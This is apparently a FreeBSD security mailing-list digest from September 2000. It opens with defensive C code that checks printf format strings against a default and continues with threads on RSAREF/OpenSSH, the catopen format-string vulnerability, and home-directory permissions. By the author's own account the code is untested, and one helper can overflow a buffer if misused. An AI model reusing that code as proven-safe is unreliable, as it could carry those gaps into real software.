PRINTF(1) man page. * * I don't know how safe this is. It is mostly untested. Likewise, I don't * know how portable it is. Finally, no amount of analysis of a string can * truly guarantee that it is safe, because the analysis code is not the same * as the code that actually uses the analyzed parameters (in this case, the * printf() family of functions). Because the does not share the exact same * parsing code with the printf() functions, slight differences may occur that * result in insecurity. * * Aaron out. */ /* ========== START OF HEADER ========== */ /* These two function prototypes should really be in a header file */ #include #include /* * Name: safe_fmtstr * * Parameters: * default_fmt The default format string * pref_fmt A preferred format string * fmt_len The maximum length permitted * * The two format strings are analyzed. If the format * specifiers in both format strings match exactly and * if the preferred format string does not exceed the * maximum length permitted, it is considered safe. * * Return values: * * The pref_fmt string is returned IF it matches exactly * the format specifiers found in default_fmt AND if the * pref_fmt does not exceed the maximum length. * * If the pref_fmt string does not match (is unsafe) or * if it exceeds the maximum length, the default_fmt string * is returned instead. * * If the fmt_len parameter is zero, the maximum length * permitted is infinity. * */ char *safe_fmtstr(char *defalt_fmt, char *pref_fmt, size_t fmt_len); /* * Name: compress_fmtstr * Parameters: * fmt A single C-style string containing a printf() * type format string. * * This function analyzes the passed printf() format string and * returns a compressed C-style string that represents the number * and types of format items found in the format string. * * Return values: * * On success, a non-null C-string is returned. The caller is * responsible to free this returned string (since it was allocated * using malloc()) when the caller is finished with it. * * On failure, a null value (char *)0 is returned instead. */ char *compress_fmtstr(char *fmt); /* ========== END OF HEADER ========== */ #define DEBUG #ifdef DEBUG #include #endif /* * Assumptions this code makes: * * 1. Any string that matches the following perl regular * expression is considered a format specifier: * m/%[#+ 0-]*[0-9*]*(\.[0-9*]*)?[diouXxfeEgGcs%]/ * 2. This code treats the '\' character as just another * ordinary non-format specifier character. * 3. Character sequences that partially match the above * perl regular expression are invalid or incomplete * format specifiers, but this code will still treat the * sequence the same way valid and complete format * specifiers are treated. * 4. As shown in the above perl reular expression, this code * assumes NO MAXIMUM length of the format specifier or the * several subsections thereof. * * Please let the author know if any of these assumptions are * invalid or dangerous. * * This code uses a very simple finite state parsing machine to * count the number of format items and the types. * * A few quick definitions for the finite state parsing machine: * * FMT_START Exactly ONE occurences of the '%' character * FMT_FLAG ZERO or MORE of the following characters: * '#', '+', ' ', '0', or '-' * FMT_WIDTHSTART ZERO or ONE of the following characters: * digits '1' through '9', or the '*' character * FMT_WIDTH ZERO or MORE of the following characters: * digits '0' through '9', or the '*' character * FMT_DOT ZERO or ONE occurences of the '.' character. * a precision specification or end of FMT_WIDTH * FMT_PREC ZERO or MORE of the following characters: * digits '0' through '9', or the '*' character * FMT_FORMAT Exactly ONE of the following characters: * 'd', 'i', 'o', 'u', 'X', 'x', 'f', 'e', 'E', 'g', * 'G', 'c', 's', or '%' * * Finite state parsing machine states: * * STATE: MEANING: * MODE_CHAR NO formatting has yet been encountered - expecting * FMT_START or more ordinary characters or escape * sequences. * MODE_START FMT_START encountered - expecting FMT_FLAG | FMT_WIDTHSTART | * FMT_DOT | FMT_FORMAT * MODE_FLAG FMT_FLAG encountered - expecting FMT_WIDTHSTART | FMT_DOT | * FMT_FORMAT * MODE_WIDTH FMT_WIDTH encountered - expecting FMT_WIDTH | FMT_DOT | * FMT_FORMAT * MODE_DOT FMT_DOT encountered - expecting FMT_PREC | FMT_FORMAT * MODE_PREC FMT_PREC encountered - expecting FMT_PREC | FMT_FORMAT * MODE_FORMAT FMT_FORMAT encountered - ALL DONE - this mode really * doesn't exist since the formatting is finished at this * point and the mode will revert back to MODE_CHAR. */ /* State machine modes */ #define MODE_CHAR 0 #define MODE_START 1 #define MODE_FLAG 2 #define MODE_WIDTH 3 #define MODE_DOT 4 #define MODE_PREC 5 /* Some defines for inlining parsing character comparisons */ #define FMT_START_TEST \ *ch == '%' #define FMT_WIDTHSTART_TEST \ '1': \ case '2': \ case '3': \ case '4': \ case '5': \ case '6': \ case '7': \ case '8': \ case '9': \ case '*' #define FMT_WIDTH_TEST \ '0': \ case '1': \ case '2': \ case '3': \ case '4': \ case '5': \ case '6': \ case '7': \ case '8': \ case '9': \ case '*' #define FMT_PREC_TEST FMT_WIDTH_TEST #define FMT_FLAG_TEST \ '#': \ case '+': \ case '-': \ case ' ': \ case '0' #define FMT_DOT_TEST '.' #define FMT_FORMAT_TEST \ 'd': \ case 'i': \ case 'o': \ case 'u': \ case 'X': \ case 'x': \ case 'f': \ case 'e': \ case 'E': \ case 'g': \ case 'G': \ case 'c': \ case 's': \ case '%' /* And some inlined action code */ #define DO_MODE_START {\ mode = MODE_START; \ } #define DO_MODE_FLAG {\ if (buf != (char *)0) \ *buf++ = *ch; \ formatlen++; \ mode = MODE_FLAG; \ } #define DO_MODE_WIDTH {\ if (buf != (char *)0) \ *buf++ = *ch; \ formatlen++; \ mode = MODE_WIDTH; \ } #define DO_MODE_DOT {\ if (buf != (char *)0) \ *buf++ = *ch; \ formatlen++; \ mode = MODE_DOT; \ } #define DO_MODE_PREC {\ if (buf != (char *)0) \ *buf++ = *ch; \ formatlen++; \ mode = MODE_PREC; \ } #define DO_MODE_FORMAT {\ if (buf != (char *)0) \ *buf++ = *ch; \ formatlen++; \ mode = MODE_CHAR; \ } #define DO_INVALID_FORMAT {\ if (buf != (char *)0) \ *buf++ = '*'; \ formatlen++; \ mode = MODE_CHAR; \ } /* * INTERNAL USE ONLY - This function implements the finite state * format scanning engine. The arguments are the format string * and an optional buffer in which to write the compressed * format representation. It is INTERNAL ONLY because it MUST * be called once with a null buffer so as to count how many * format items there are. Then the second time, a buffer of * sufficient length can be passed to the routine. If a person * were foolish enough to just pass in an arbitrary buffer, there * is the possibility of buffer overflow. So DON'T DO IT! * * Returns the size of the buffer required (including space for the * terminating byte and in some cases, some extra "work" space). */ /* * Name: scan_fmtstr * Parameters; * fmt A C-style string containing a printf()-like * format string. * buf Another C-style string buffer OR NULL * * This function is intended for INTERNAL USE ONLY by the other * functions in this file. It implements the finite state * machine. * * Return values: * * The function returns the size of a C-style string buffer * required to hold a compressed format string (including a * byte for the C-string terminator character '\0'). * * If called with a NULL buf parameter, the parser only returns * the expected buffer size. If called with a NON-NULL buf * parameter, that non-NULL buffer will contain the compressed * string of exactly the size (including terminating '\0' char.) * that the return value indicates. * * WARNING: * If the passed buffer is too small, this function will * overflow/overrun the buffer. That is why it is recommended * that this function FIRST be called with a NULL buf parameter * to determine the size of buffer required, then the function * be called a second time (using the exact same format string) * with a buffer of sufficient size. */ size_t scan_fmtstr(char *fmt, char *buf) { char *ch; size_t formatlen = 0; size_t maxlen = 0; int mode = MODE_CHAR; /* Shortcut if the format string is null */ if (fmt == (char *)0) { if (buf != (char *)0) *buf = (char)0; return 0; } /* * Finite state machine. If the passed buffer variable buf * is null (buf == (char *)0) then we just count the format * specifications. If it is non-null, we assume that a * count has already been done on this format string in the * past and a sufficient C string has been allocated for the * buffer so we can safely copy format items into it. */ for (ch = fmt; *ch; ch++) { switch (mode) { case MODE_CHAR: if (FMT_START_TEST) DO_MODE_START; break; case MODE_START: switch (*ch) { case FMT_FLAG_TEST: DO_MODE_FLAG; break; case FMT_WIDTHSTART_TEST: DO_MODE_WIDTH; break; case FMT_DOT_TEST: DO_MODE_DOT; break; case FMT_FORMAT_TEST: DO_MODE_FORMAT; break; /* Invalid Format */ default: DO_INVALID_FORMAT; } break; case MODE_FLAG: switch (*ch) { case FMT_WIDTHSTART_TEST: DO_MODE_WIDTH; break; case FMT_DOT_TEST: DO_MODE_DOT; break; case FMT_FORMAT_TEST: DO_MODE_FORMAT; break; /* Invalid Format */ default: DO_INVALID_FORMAT; } break; case MODE_WIDTH: switch (*ch) { case FMT_WIDTH_TEST: DO_MODE_WIDTH; break; case FMT_DOT_TEST: DO_MODE_DOT; break; case FMT_FORMAT_TEST: DO_MODE_FORMAT; break; /* Invalid Format */ default: DO_INVALID_FORMAT; } break; case MODE_DOT: switch (*ch) { case FMT_PREC_TEST: DO_MODE_PREC; break; case FMT_FORMAT_TEST: DO_MODE_FORMAT; break; /* Invalid Format */ default: DO_INVALID_FORMAT; } break; case MODE_PREC: switch (*ch) { case FMT_PREC_TEST: DO_MODE_PREC; break; case FMT_FORMAT_TEST: DO_MODE_FORMAT; break; /* Invalid Format */ default: DO_INVALID_FORMAT; } break; default: /* This should NEVER happen! */ #ifdef DEBUG assert(0); #endif } } if (mode != MODE_CHAR) DO_INVALID_FORMAT; if (buf != (char *)0) /* Terminate the buffer with the C '\0' terminator character */ *buf = (char)0; /* * Return the size of buffer required (with space for the * terminating byte) */ return ((maxlen > formatlen) ? maxlen : formatlen) + 1; } char *compress_fmtstr(char *fmt) { size_t len = scan_fmtstr(fmt, (char *)0); char *buf = (char *)malloc(len * sizeof(char)); if (buf == (char *)0) { /* malloc() must have failed - return NULL */ return buf; } scan_fmtstr(fmt, buf); return buf; } char *safe_fmtstr(char *default_fmt, char *pref_fmt, size_t fmt_len) { char *a, *b; /* If the preferred format length exceeds the limit, return the default */ if (fmt_len > 0 && pref_fmt != (char *)0 && strlen(pref_fmt) > fmt_len) return default_fmt; a = compress_fmtstr(default_fmt); if (a == (char *)0) { /* malloc() must have failed - default to original format */ return default_fmt; } b = compress_fmtstr(pref_fmt); if (b == (char *)0) { /* malloc() must have failed - default to original format */ free(a); return default_fmt; } if (strcmp(a, b)) { /* * The pref_fmt string does NOT match the default_fmt * string's format specifiers, and so is considered * UNSAFE. Return the default. */ free(a); free(b); return default_fmt; } /* * The pref_fmt string does MATCH the default_fmt * string's format specifiers exactly, so it is considered * SAFE. Return the preferred format. */ free(a); free(b); return pref_fmt; } #if 0 /* FOR TESTING ONLY: */ #include int main(int argc, char *argv[]) { char **a = argv; if (*a) a++; while (*a && **a) { /* * I'm deliberately not free()ing the malloc()ated strings that * the compress_fmtstr() function returns because this test code * can leak memory all it wants to. ;) */ printf("FORMAT STRING '%s' compresses to '%s'\n",*a,compress_fmtstr(*a)); if (*(a+1)) printf("safe_fmtstr('%s', '%s', 0) = '%s'\n", *a, *(a+1), safe_fmtstr(*a, *(a+1), 0)); a++; } return 0; } #endif To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 10:43:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from shell.futuresouth.com (shell.futuresouth.com [198.78.58.28]) by hub.freebsd.org (Postfix) with ESMTP id 7963A37B424; Fri, 8 Sep 2000 10:43:20 -0700 (PDT) Received: (from fullermd@localhost) by shell.futuresouth.com (8.9.3/8.9.3) id MAA11949; Fri, 8 Sep 2000 12:43:10 -0500 (CDT) Date: Fri, 8 Sep 2000 12:43:09 -0500 From: "Matthew D. Fuller" To: Kris Kennaway Cc: Brett Glass , "Aaron D. Gifford" , security@FreeBSD.ORG Subject: Re: No more RSAREF??? Message-ID: <20000908124309.B9652@futuresouth.com> References: <4.3.2.7.2.20000906165231.04a49e20@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from kris@FreeBSD.ORG on Wed, Sep 06, 2000 at 10:36:32PM -0700 X-OS: FreeBSD Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Sep 06, 2000 at 10:36:32PM -0700, a little birdie told me that Kris Kennaway remarked > On Wed, 6 Sep 2000, Brett Glass wrote: > > > This is good news! Will you also commit to -stable? Will OpenSSH > > run properly out of the box after the commit? (So far, I've never > > been able to get the version of OpenSSH in the base distribution to > > work. It complains that RSAREF is missing, even after the RSAREF > > port is installed.) > > Yes and yes. Third request: Can the PRE_SMPNG tag be slid forward on the affected files so those of us who plan to use it for a little while to see how it goes can still play RSA games with everyone else? Or will setting the MAKE_RSAINTL have close enough to the same effect as to not bother? -- Matthew Fuller (MF4839) | fullermd@over-yonder.net Unix Systems Administrator | fullermd@futuresouth.com Specializing in FreeBSD | http://www.over-yonder.net/ "The only reason I'm burning my candle at both ends, is because I haven't figured out how to light the middle yet" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 12:38:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from mass.osd.bsdi.com (mass.osd.bsdi.com [204.216.28.234]) by hub.freebsd.org (Postfix) with ESMTP id 9211537B443; Fri, 8 Sep 2000 12:38:19 -0700 (PDT) Received: from mass.osd.bsdi.com (localhost [127.0.0.1]) by mass.osd.bsdi.com (8.9.3/8.9.3) with ESMTP id UAA00530; Thu, 7 Sep 2000 20:24:33 -0700 (PDT) (envelope-from msmith@mass.osd.bsdi.com) Message-Id: <200009080324.UAA00530@mass.osd.bsdi.com> X-Mailer: exmh version 2.1.1 10/15/1999 To: Warner Losh Cc: "John Doh!" , security@FreeBSD.ORG, hackers@FreeBSD.ORG Subject: Re: How to stop problems from printf In-reply-to: Your message of "Thu, 07 Sep 2000 20:59:18 MDT." <200009080259.UAA50393@harmony.village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 07 Sep 2000 20:24:33 -0700 From: Mike Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > In message "John Doh!" writes: > : Issue is must be getting format string from "untrusted" place, but want to > : limit substitution of %... to the substitution of say in example the > : argv[0], but to not do others so that say given "usage: %s filename %p" %p > : not interpret but to be print instead as literally so we get output of > : (saying to be argv[0] as test just for example) usage: test filename %p > : > : any hints you have I am very greatful for. > > Fix gettext to only allow N arguments in the same order that the > original message had. Typically you want to use positional arguments with printf so that your gettext responses can reorder things to get better results, but the same basically applies. -- ... every activity meets with opposition, everyone who acts has his rivals and unfortunately opponents also. But not because people want to be opponents, rather because the tasks and relationships force people to take different points of view. [Dr. Fritz Todt] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 13: 5: 4 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 665C337B42C; Fri, 8 Sep 2000 13:04:59 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id NAA37481; Fri, 8 Sep 2000 13:04:59 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Fri, 8 Sep 2000 13:04:59 -0700 (PDT) From: Kris Kennaway To: "Matthew D. Fuller" Cc: Brett Glass , "Aaron D. Gifford" , security@FreeBSD.ORG Subject: Re: No more RSAREF??? In-Reply-To: <20000908124309.B9652@futuresouth.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 8 Sep 2000, Matthew D. Fuller wrote: > Third request: Can the PRE_SMPNG tag be slid forward on the affected > files so those of us who plan to use it for a little while to see how it > goes can still play RSA games with everyone else? Or will setting the > MAKE_RSAINTL have close enough to the same effect as to not bother? The PRE_SMPNG tag applies to -current. The RSA changes were committed prior to the tag in -current, and the tag doesnt apply in -stable. But MAKE_RSAINTL will have exactly the same effect anyway Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 13: 7:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 857A937B43E; Fri, 8 Sep 2000 13:07:31 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id NAA39283; Fri, 8 Sep 2000 13:07:31 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Fri, 8 Sep 2000 13:07:31 -0700 (PDT) From: Kris Kennaway To: Gabor Zahemszky Cc: freebsd-security@freebsd.org Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: <20000908144707.F682@zg.CoDe.hu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 8 Sep 2000, Gabor Zahemszky wrote: > On Thu, Sep 07, 2000 at 02:53:51AM -0700, Kris Kennaway wrote: > > HOWEVER: no program shipped in the FreeBSD base system is believed to be > > vulnerable to either of these problems. > > > > They both affect catopen(), and we don't use that function at all except > > in tcsh, which is non-privileged. We don't even have any code which has > > Oops! > > On my 3.4R system, there is a little utility, named: ee (and ree), and it > is using catopen(). I don't think it changed in 4.x, is it? They are not privileged applications. You won't get anywhere but back where you started by exploiting them. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 14:15:59 2000 Delivered-To: freebsd-security@freebsd.org Received: from almen.vxu.se (almen.vxu.se [194.47.99.100]) by hub.freebsd.org (Postfix) with ESMTP id D888037B50B for ; Fri, 8 Sep 2000 14:15:56 -0700 (PDT) Received: from XGod (aaldv97.idet.vxu.se [194.47.111.20]) by almen.vxu.se (8.8.8/8.8.7) with SMTP id XAA23882 for ; Fri, 8 Sep 2000 23:15:54 +0200 (MET DST) Message-ID: <001601c019da$05dc9140$6400a8c0@XGod> From: "David Andreas Alderud" To: Subject: Set user stack area type? Date: Fri, 8 Sep 2000 23:16:14 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is there a way to change the type of the user stack area (i.e. executable/non-executable)? /Kind regards, David A. Alderud To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 14:21:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from rocket.coresync.net (ns1.coresync.net [64.71.131.2]) by hub.freebsd.org (Postfix) with SMTP id C227937B440 for ; Fri, 8 Sep 2000 14:21:37 -0700 (PDT) Received: (qmail 6917 invoked by uid 1117); 8 Sep 2000 21:12:40 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 8 Sep 2000 21:12:40 -0000 Date: Fri, 8 Sep 2000 14:12:40 -0700 (PDT) From: "Jonathan M. Slivko" To: freebsd-security@freebsd.org Subject: Home Directories -- in the point of security? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org What chmod value should I use when modifying home directories to allow for a personal website on a webserver without comprimsing security of the files from other users, even reading the files is out of the question entirely. ---- Jonathan M. Slivko Technical Support: CoreSync Corparation NSI ID: JSR730 Want a reliable shells? check us out at http://www.coresync.net! ---- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 14:29:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from epsilon.lucida.qc.ca (epsilon.lucida.qc.ca [216.95.146.6]) by hub.freebsd.org (Postfix) with SMTP id 4422D37B507 for ; Fri, 8 Sep 2000 14:29:50 -0700 (PDT) Received: (qmail 36054 invoked by uid 1000); 8 Sep 2000 21:29:44 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 8 Sep 2000 21:29:44 -0000 Date: Fri, 8 Sep 2000 17:29:42 -0400 (EDT) From: Matt Heckaman X-Sender: matt@epsilon.lucida.qc.ca To: "Jonathan M. Slivko" Cc: freebsd-security@freebsd.org Subject: Re: Home Directories -- in the point of security? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, 8 Sep 2000, Jonathan M. Slivko wrote: : What chmod value should I use when modifying home directories to allow for : a personal website on a webserver without comprimsing security of the : files from other users, even reading the files is out of the question : entirely. Mode 0711 for directories will do what you want, without allowing anyone else read access. Just make sure to educate your users about permissions, so that they leave the settings right -inside- the dir. I force this by making all my users umask 027, big help. :) : ---- : Jonathan M. Slivko : Technical Support: CoreSync Corparation : NSI ID: JSR730 * Matt Heckaman - mailto:matt@lucida.qc.ca http://www.lucida.qc.ca/ * * GPG fingerprint - A9BC F3A8 278E 22F2 9BDA BFCF 74C3 2D31 C035 5390 * -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.2 (FreeBSD) Comment: http://www.lucida.qc.ca/pgp iD8DBQE5uVpIdMMtMcA1U5ARAk09AKDRA4XUiVyvGGXCbZ7sDcYbQBli7QCeJweK iWCXaHmt9dBAnTITUlNFzDQ= =IjxP -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 14:39:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from earth.wnm.net (earth.wnm.net [208.246.240.243]) by hub.freebsd.org (Postfix) with ESMTP id 94D5E37B505 for ; Fri, 8 Sep 2000 14:39:39 -0700 (PDT) Received: from localhost (alex@localhost) by earth.wnm.net (8.11.0/8.11.0) with ESMTP id e88LfBj04929; Fri, 8 Sep 2000 16:41:11 -0500 (CDT) Date: Fri, 8 Sep 2000 16:41:11 -0500 (CDT) From: Alex Charalabidis To: "Jonathan M. Slivko" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Home Directories -- in the point of security? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 8 Sep 2000, Jonathan M. Slivko wrote: > What chmod value should I use when modifying home directories to allow for > a personal website on a webserver without comprimsing security of the > files from other users, even reading the files is out of the question > entirely. > Use 711 or 701 and fix the skeleton directory to make the files inside that don't need to be readable 600. -ac -- ============================================================== Alex Charalabidis (AC8139) 5050 Poplar Ave, Ste 170 Systems Administrator Memphis, TN 38157 WebNet Memphis (901) 432 6000 Author, The Book of IRC http://www.bookofirc.com/ ============================================================== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 14:45:20 2000 Delivered-To: freebsd-security@freebsd.org Received: from agora.rdrop.com (agora.rdrop.com [199.2.210.241]) by hub.freebsd.org (Postfix) with ESMTP id AD05437B446 for ; Fri, 8 Sep 2000 14:45:17 -0700 (PDT) Received: (from alan@localhost) by agora.rdrop.com (8.8.7/8.8.7) id OAA10927; Fri, 8 Sep 2000 14:45:14 -0700 (PDT) (envelope-from alan) Date: Fri, 8 Sep 2000 14:45:14 -0700 From: Alan Batie To: Matt Heckaman Cc: "Jonathan M. Slivko" , freebsd-security@FreeBSD.ORG Subject: Re: Home Directories -- in the point of security? Message-ID: <20000908144513.I4603@agora.rdrop.com> Mail-Followup-To: Matt Heckaman , "Jonathan M. Slivko" , freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: ; from matt@ARPA.MAIL.NET on Fri, Sep 08, 2000 at 05:29:42PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Sep 08, 2000 at 05:29:42PM -0400, Matt Heckaman wrote: > Mode 0711 for directories will do what you want, without allowing anyone > else read access. Until someone leaves their .profile or .cshrc file writeable accidentally because they don't understand unix permissions or are tricked into it. Or someone guesses a file name. Or many other scenarios. The answer I chose is to put the web directory somewhere else (/home/web/), reconfigure the web server and leave the user directories 700. -- Alan Batie ______ www.rdrop.com/users/alan Me alan@batie.org \ / www.qrd.org The Triangle PGPFP DE 3C 29 17 C0 49 7A \ / www.pgpi.com The Weird Numbers 27 40 A5 3C 37 4A DA 52 B9 \/ www.anti-spam.net NO SPAM! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 14:47:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from rocket.coresync.net (ns1.coresync.net [64.71.131.2]) by hub.freebsd.org (Postfix) with SMTP id 0ABC937B446 for ; Fri, 8 Sep 2000 14:47:18 -0700 (PDT) Received: (qmail 25233 invoked by uid 1117); 8 Sep 2000 21:38:20 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 8 Sep 2000 21:38:20 -0000 Date: Fri, 8 Sep 2000 14:38:08 -0700 (PDT) From: "Jonathan M. Slivko" To: Alan Batie Cc: Matt Heckaman , freebsd-security@FreeBSD.ORG Subject: Re: Home Directories -- in the point of security? In-Reply-To: <20000908144513.I4603@agora.rdrop.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Actually, that sounds like an even better idea than what was suggested before. Thanks Alan! - ---- Jonathan M. Slivko Technical Support: CoreSync Corparation NSI ID: JSR730 Want a reliable shells? check us out at http://www.coresync.net! - ---- On Fri, 8 Sep 2000, Alan Batie wrote: > On Fri, Sep 08, 2000 at 05:29:42PM -0400, Matt Heckaman wrote: > > Mode 0711 for directories will do what you want, without allowing anyone > > else read access. > > Until someone leaves their .profile or .cshrc file writeable accidentally > because they don't understand unix permissions or are tricked into it. > Or someone guesses a file name. Or many other scenarios. The answer > I chose is to put the web directory somewhere else (/home/web/), > reconfigure the web server and leave the user directories 700. > > -- > Alan Batie ______ www.rdrop.com/users/alan Me > alan@batie.org \ / www.qrd.org The Triangle > PGPFP DE 3C 29 17 C0 49 7A \ / www.pgpi.com The Weird Numbers > 27 40 A5 3C 37 4A DA 52 B9 \/ www.anti-spam.net NO SPAM! > -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Comment: Made with pgp4pine 1.75 Charset: noconv iQA/AwUBOblcSsELej+B3y/WEQIR9QCfSJfi476IEm9o43CEcP7VrAwNNbQAoNTH 7dKzCVkjhNKavpksD9BGuvti =YgTQ -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 14:50:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from epsilon.lucida.qc.ca (epsilon.lucida.qc.ca [216.95.146.6]) by hub.freebsd.org (Postfix) with SMTP id D1AFC37B506 for ; Fri, 8 Sep 2000 14:50:07 -0700 (PDT) Received: (qmail 36206 invoked by uid 1000); 8 Sep 2000 21:50:07 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 8 Sep 2000 21:50:07 -0000 Date: Fri, 8 Sep 2000 17:50:06 -0400 (EDT) From: Matt Heckaman X-Sender: matt@epsilon.lucida.qc.ca To: Alan Batie Cc: "Jonathan M. Slivko" , freebsd-security@FreeBSD.ORG Subject: Re: Home Directories -- in the point of security? In-Reply-To: <20000908144513.I4603@agora.rdrop.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, 8 Sep 2000, Alan Batie wrote: ... : Until someone leaves their .profile or .cshrc file writeable accidentally : because they don't understand unix permissions or are tricked into it. : Or someone guesses a file name. Or many other scenarios. The answer : I chose is to put the web directory somewhere else (/home/web/), : reconfigure the web server and leave the user directories 700. Exactly. That is why the umask is 027 (set by /etc/loginc.conf) So, for a user to get unsafe permissions, they would have to go out of their way and set the permission. There are no defaults that leave a file vulnerable to the above with that setup. Since for it to fail, it depends on the user manually modifying the file permissions. At that point, I step back since they could just as easily do chmod 777 /usr/home/$user. :) : -- : Alan Batie ______ www.rdrop.com/users/alan Me : alan@batie.org \ / www.qrd.org The Triangle : PGPFP DE 3C 29 17 C0 49 7A \ / www.pgpi.com The Weird Numbers : 27 40 A5 3C 37 4A DA 52 B9 \/ www.anti-spam.net NO SPAM! * Matt Heckaman - mailto:matt@lucida.qc.ca http://www.lucida.qc.ca/ * * GPG fingerprint - A9BC F3A8 278E 22F2 9BDA BFCF 74C3 2D31 C035 5390 * -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.2 (FreeBSD) Comment: http://www.lucida.qc.ca/pgp iD8DBQE5uV8PdMMtMcA1U5ARAnWGAJ9+mBkTQdlm19aO9Opj0LJGRb8zLwCg43in vV/GdnGRMfN00sAWVShk7WQ= =7r9D -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 15:19:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 970A737B509 for ; Fri, 8 Sep 2000 15:19:46 -0700 (PDT) Received: from mustang.lariat.org 